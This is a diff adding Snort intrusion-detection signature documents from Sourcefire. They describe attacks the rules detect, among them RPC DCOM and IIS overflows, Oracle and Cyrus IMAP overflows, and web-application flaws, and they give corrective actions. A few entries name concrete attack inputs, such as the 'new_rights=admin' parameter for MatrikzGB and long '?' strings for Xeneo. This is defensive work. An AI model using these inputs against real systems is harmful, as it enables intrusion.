+--
+Sid:
+1495
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1506.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1506
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3303.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3303
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/272.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+272
+
+--
+Summary:
+This event is generated when a remote attacker transmits fragmented IGMP packets with malformed headers to the internal network, indicating an IGMP Denial of Service (DoS) attack.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+If an IGMP packet with a malformed header is transmitted to an unpatched Microsoft Windows computer, the computer may crash when it attempts to process the packet.  
+
+--
+Affected Systems:
+Microsoft Windows 95
+Microsoft Windows 98
+Microsoft Windows 98 SE
+Microsoft Windows NT 4
+
+--
+Attack Scenarios:
+An attacker sends fragmented IGMP packets with malformed headers to a target computer. If the computer is running an unpatched version of Windows, it may crash.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Install the latest patches available for your operating system. See http://www.microsoft.com/technet/security/bulletin/ms99-034.asp for more information.
+
+Implement a packet-filtering firewall to block inappropriate traffic to the network.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/514
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms99-034.asp
+
+--
--- /dev/null
+++ b/doc/signatures/3269.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3269
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3310.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3310
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2693.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2693
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure verify_queue_types_no_queue
+. This procedure is included in
+sys.dbms_aqadm.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1681.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1681
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/971.txt
@@ -0,0 +1,62 @@
+Rule:
+--
+Sid:
+971
+
+--
+
+Summary:
+This event is generated when an attempt is made to compromise a web 
+server running IIS 5.0 by exploiting the ".printer" bug.
+
+--
+Impact:
+Serious. Remote unauthorized administrative access.
+
+--
+Detailed Information:
+With the increasing pervasion of the Internet, vendors are adding 
+features into their software to support the networked world.  
+Microsoft's initial implementation of one such feature were the 
+".printer" extensions on IIS 5.0 that first shipped with Windows 2000.
+
+A bug exsisted in the initial release that could result in remote system
+level access to the web server.  A patch has been released that fixes 
+this bug.
+
+--
+Attack Scenarios:
+A hacker could use this vulnerability to get a remote, system level 
+command prompt on the server.
+
+--
+Ease of Attack:
+Simple. Exploit software exists.
+
+--
+False Positives:
+There are legitimate uses of the ".printer" feature, though it is 
+unknown how widely it is used.  You should know if this feature is 
+implemented on your web servers.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Install latest patches from the vendor, or disable the ".printer" extensions using the IIS administration tool.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Vendor Security Bulletin: MS01-023
+Bugtraq Archive: url,http://www.securityfocus.com/archive/1/181937
+
+--
--- /dev/null
+++ b/doc/signatures/1286.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1286
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1013.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1013
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1077.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1077
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1405.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1405
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3181.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3181
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000133.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+100000133
+
+-- 
+Summary: 
+This event is generated when an attempt is made to cause a denial of service 
+against the Xeneo web server by sending it a request with an overly large 
+number of "?" characters.
+
+-- 
+
+Impact: 
+A denial of service will occur, and it may be possible to execute arbitrary 
+code with the privileges of the user running the web server.
+
+--
+Detailed Information:
+The denial of service is triggered when a GET request is made with more than 
+4096 "?" characters. The rule actually looks for 250 consecutive "?" 
+characters, as even that should never occur, and looking for a smaller number 
+increases the rule's performance.
+
+--
+Affected Systems:
+Northern Solutions Xeneo Web Server 2.2.10
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser or an automated script.
+
+-- 
+
+Ease of Attack: 
+Simple, as a web browser can be used.
+
+-- 
+
+False Positives:
+If a valid request contains more than 250 and less than 4096 consecutive "?" 
+characters, a false positive will be generated.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Currently, no patches or upgrades are available from the vendor, and no 
+workarounds are known.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1524.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1524
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2331.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2331
+
+--
+Summary:
+This event is generated when an attempt is made to possibly gain
+administrative access to the MatrikzGB Guestbook PHP application running
+on a server.
+
+--
+Impact:
+Possible administrative access to the Guestbook.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the MatrikzGB Guestbook web application running on a server.
+
+It is possible for an attacker to modify the appropriate URI parameter
+in the index.php script to gain administrative rightst to the MatrikzGB
+Guestbook.
+
+--
+Affected Systems:
+	MatrikzGB Guestbook 2.0
+
+--
+Attack Scenarios:
+An attacker can supply "admin" to the "new_rights" parameter in the PHP
+script index.php.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000753.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000753
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Free QBoard" application running on a webserver. Access to the file "delete.php" using a remote file being passed as the "qb_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "qb_path" parameter in the "delete.php" script used by the "Free QBoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Free QBoard
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1993.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+1993
+
+--
+Summary:
+This event is generated when a remote attacker sends a LOGIN command
+with a suspiciously long argument to an internal IMAP server, indicating
+an attempt to exploit a buffer overflow vulnerability in Carnegie Mellon
+University Cyrus IMAP Server. This may also affect other IMAP server
+implementations.
+
+--
+Impact:
+Possible remote execution of arbitrary code, leading to remote root compromise.
+
+--
+Detailed Information:
+Carnegie Mellon University Cyrus IMAP Server 2.1.10 and earlier contains
+a buffer overflow vulnerability where a malformed, overly long argument
+to a LOGIN command sent to a vulnerable IMAP server can cause a buffer
+overflow condition. This can allow the attacker to overwrite data in
+memory, leading to the execution of arbitrary code on the server with
+the security privileges of the IMAP server process.    
+
+--
+Affected Systems:
+	CMU Cyrus IMAP Server version 2.1.10 or earlier.
+
+--
+Attack Scenarios:
+An attacker sends a LOGIN command with an overly long, specially crafted
+argument to a vulnerable IMAP server, causing a buffer overflow
+condition. The attacker can then overwrite specific words in memory to
+execute arbitrary code on the server with the security privileges of the
+IMAP server process.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1874.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1874
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3315.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3315
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000704.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+100000704
+--
+Summary:
